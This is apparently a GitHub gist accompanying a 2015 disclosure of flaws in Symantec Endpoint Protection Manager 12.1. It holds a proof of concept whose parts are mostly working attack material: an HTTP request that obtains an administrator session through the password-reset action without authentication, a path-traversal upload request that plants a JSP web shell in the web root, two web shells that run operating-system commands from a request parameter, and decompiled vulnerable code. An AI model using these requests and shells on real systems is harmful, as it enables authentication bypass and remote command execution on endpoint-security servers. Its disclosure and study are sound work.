Last active
August 29, 2015 14:26
-
-
Save mwulftange/ecbb9a8b8f433118a514 to your computer and use it in GitHub Desktop.
SYM15-007: Symantec Endpoint Protection 12.1 (http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/exec.jsp&KnownHosts=. HTTP/1.1 | |
Host: 192.168.40.133:8443 | |
Cookie: JSESSIONID=625B492F4B9B6DA96B5E0C70A8A72F40 | |
Content-Length: 124 | |
<%=new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("\\A").next()%> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* */ public void handleRequest(RequestData requestData, ConsoleSession session, Document doc) | |
/* */ { | |
/* 54 */ NodeList list = doc.getElementsByTagName("Response"); | |
/* 55 */ Element root = (Element)list.item(0); | |
/* 56 */ String action = (String)requestData.get("Action"); | |
/* 57 */ String id = (String)requestData.get("GUID"); | |
/* 58 */ String fileType = (String)requestData.get("FILE_TYPE"); | |
/* 59 */ String newId = (String)requestData.get("NEW_GUID"); | |
/* */ | |
/* 60-187 skipped */ | |
/* */ | |
/* 189 */ if (action.equalsIgnoreCase("UploadPackage")) { | |
/* 190 */ String fileName = (String)requestData.get("PackageFile"); | |
/* 191 */ String dirName = (String)requestData.get("KnownHosts"); | |
/* */ | |
/* 193 */ this.packageTempPath = (ScmProperties.getServerHome() + ConstantValue.TEMP_PACKAGE_RELATIVE_PATH); | |
/* */ | |
/* */ | |
/* 196 */ if ((dirName != null) && (dirName.length() > 0) && (!dirName.contains("/")) && (!dirName.contains("\\"))) { | |
/* 197 */ this.packageTempPath = (this.packageTempPath + File.separator + dirName); | |
/* */ } | |
/* 199 */ String path = this.packageTempPath + File.separator + fileName; | |
/* 200 */ FileOutputStream fos = null; | |
/* 201 */ BufferedOutputStream bos = null; | |
/* 202 */ Object is = null; | |
/* 203 */ BufferedInputStream bis = null; | |
/* */ | |
/* 205 */ File folder = new File(this.packageTempPath); | |
/* 206 */ if (!folder.exists()) { | |
/* 207 */ if (!folder.mkdirs()) { | |
/* 208 */ root.setAttribute("ResponseCode", String.valueOf(303169573)); | |
/* */ } | |
/* */ } | |
/* */ else { | |
/* */ try | |
/* */ { | |
/* 214 */ Utility.emptyDir(folder.getCanonicalPath(), false); | |
/* */ } catch (IOException e) { | |
/* 216 */ ServerLogger.log(this, e); | |
/* 217 */ root.setAttribute("ResponseCode", String.valueOf(303169573)); | |
/* */ | |
/* 219 */ return; | |
/* */ } | |
/* */ } | |
/* */ | |
/* 223 */ byte[] buf = new byte[1024]; | |
/* 224 */ int read = 0; | |
/* */ try | |
/* */ { | |
/* 227 */ is = new BufferedInputStream(requestData.getInputStream()); | |
/* 228 */ fos = new FileOutputStream(path); | |
/* 229 */ bos = new BufferedOutputStream(fos); | |
/* 230 */ bis = new BufferedInputStream((InputStream)is); | |
/* 231 */ while ((read = bis.read(buf)) > 0) { | |
/* 232 */ bos.write(buf, 0, read); | |
/* */ } | |
/* 234 */ bos.flush(); | |
/* 235 */ root.setAttribute("ResponseCode", String.valueOf(0)); | |
/* */ } catch (IOException ex) { | |
/* 237 */ ServerLogger.log(this, ex); | |
/* 238 */ root.setAttribute("ResponseCode", String.valueOf(303169573)); | |
/* */ } | |
/* */ finally | |
/* */ { | |
/* 242 */ IOUtilities.closeInputStream((InputStream)is); | |
/* 243 */ IOUtilities.closeInputStream(bis); | |
/* 244 */ IOUtilities.closeOutputStream(fos); | |
/* 245 */ IOUtilities.closeOutputStream(bos); | |
/* */ } | |
/* */ | |
/* 247-328 skipped */ | |
/* */ | |
/* */ } | |
/* */ } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /servlet/ConsoleServlet HTTP/1.1 | |
Host: 192.168.40.133:8443 | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 45 | |
ActionType=ResetPassword&UserID=admin&Domain= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
HTTP/1.1 200 OK | |
Set-Cookie: JSESSIONID=625B492F4B9B6DA96B5E0C70A8A72F40; Path=/; Secure; HttpOnly | |
X-XSS-Protection: 1; mode=block | |
X-Content-Type-Options: nosniff | |
Content-Type: text/xml;charset=UTF-8 | |
Date: Tue, 30 Jun 2015 11:19:30 GMT | |
Server: SEPM | |
Content-Length: 971 | |
<?xml version="1.0" encoding="UTF-8" standalone="no"?> | |
<Response ResponseCode="-2130181964"> | |
<ReportingElement><?xml version="1.0" encoding="UTF-8" standalone="no"?> | |
<ReportingInfo AdminType="0" AllowCollectFileFingerprintList="1" AllowDeleteFromQuarantine="1" AllowDisableDownloadAdvisor="1" AllowDisableNetworkThreatProtect="1" AllowEnableAutoProtect="1" AllowEnableDownloadAdvisor="1" AllowEnableNetworkThreatProtect="1" AllowPowerEraserScan="1" AllowRestartComputers="1" AllowScan="1" AllowUpdateContent="1" AllowUpdateContentScan="1" AllowedDomains="" ChangePwd="0" ComplianceOnly="0" ComputerIPs="" ComputerNames="" DateFormat="M/d/yy" DisallowedCentralizedExceptions="0" FullAccessGroupList="" GroupWhiteList="" IsStoredProcedureValid="0" KICKOUTTIME="3600000" Lang="en_US" LastLoginTime="1435663154502" LegacyDomains="" LegacyGroups="" Role="1" Servers="" Session="625B492F4B9B6DA96B5E0C70A8A72F40"/> | |
</ReportingElement> | |
</Response> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* */ protected AdminCredential getCredential(RequestData requestData, ConsoleSession session) throws ServerException | |
/* */ { | |
/* 367 */ session = session.getNewSession(); | |
/* 368 */ AdminCredential credential = doGetAdminCredentialWithoutAuthentication(); | |
/* 369 */ session.setAdminCredential(credential); | |
/* 370 */ return credential; | |
/* */ } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* */ public void handleRequest(RequestData requestData, ConsoleSession session, Document doc) | |
/* */ { | |
/* 72 */ this.requestData = requestData; | |
/* 73 */ String userName = (String)requestData.get("UserID"); | |
/* 74 */ String domainName = (String)requestData.get("Domain"); | |
/* */ | |
/* 76 */ NodeList list = doc.getElementsByTagName("Response"); | |
/* 77 */ Element root = (Element)list.item(0); | |
/* */ try | |
/* */ { | |
/* 80 */ if (!isValidRequestWithinGivenInterval(requestData.getRemoteIP())) { | |
/* 81 */ throw new ServerException(-2130182144, 186); | |
/* */ } | |
/* */ | |
/* 84 */ checkIfSiteCanRecoverPasswords(); | |
/* 85 */ init(); | |
/* */ | |
/* 87 */ if ((this.sRecipient == null) || (this.sRecipient.length() == 0) || (" ".equals(this.sRecipient))) { | |
/* 88 */ ServerLogger.log(Level.INFO, "Problem with Mail server Configuration"); | |
/* 89 */ throw new ServerException(-2130182144, 179); | |
/* */ } | |
/* */ | |
/* 92 */ AdminCredential credential = getCredential(requestData, session); | |
/* */ | |
/* 94 */ if ((credential != null) && (credential.getAdminID() != null)) { | |
/* 95 */ Integer mode = credential.getOptAuthenticationMethod(); | |
/* 96 */ if ((mode != null) && (SemAdministrator.DEFAULT.intValue() != mode.intValue())) { | |
/* 97 */ ServerLogger.log(Level.INFO, "Particular admin named " + credential.getAdminName() + " is not at Symantec authentication mode. Failed to reset password."); | |
/* */ | |
/* 100 */ throw new ServerException(-2130182144, 191); | |
/* */ } | |
/* */ | |
/* */ } | |
/* */ | |
/* 106-137 skipped */ | |
/* */ | |
/* */ } | |
/* */ catch (ServerException e) { | |
/* 142 */ root.setAttribute("ResponseCode", "" + (e.getErrorCode() | e.getMessageId())); | |
/* */ } | |
/* */ } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%> | |
<% | |
try { | |
out.print(SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", request.getParameter("cmd")))); | |
} catch (Exception e) { | |
} | |
%> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment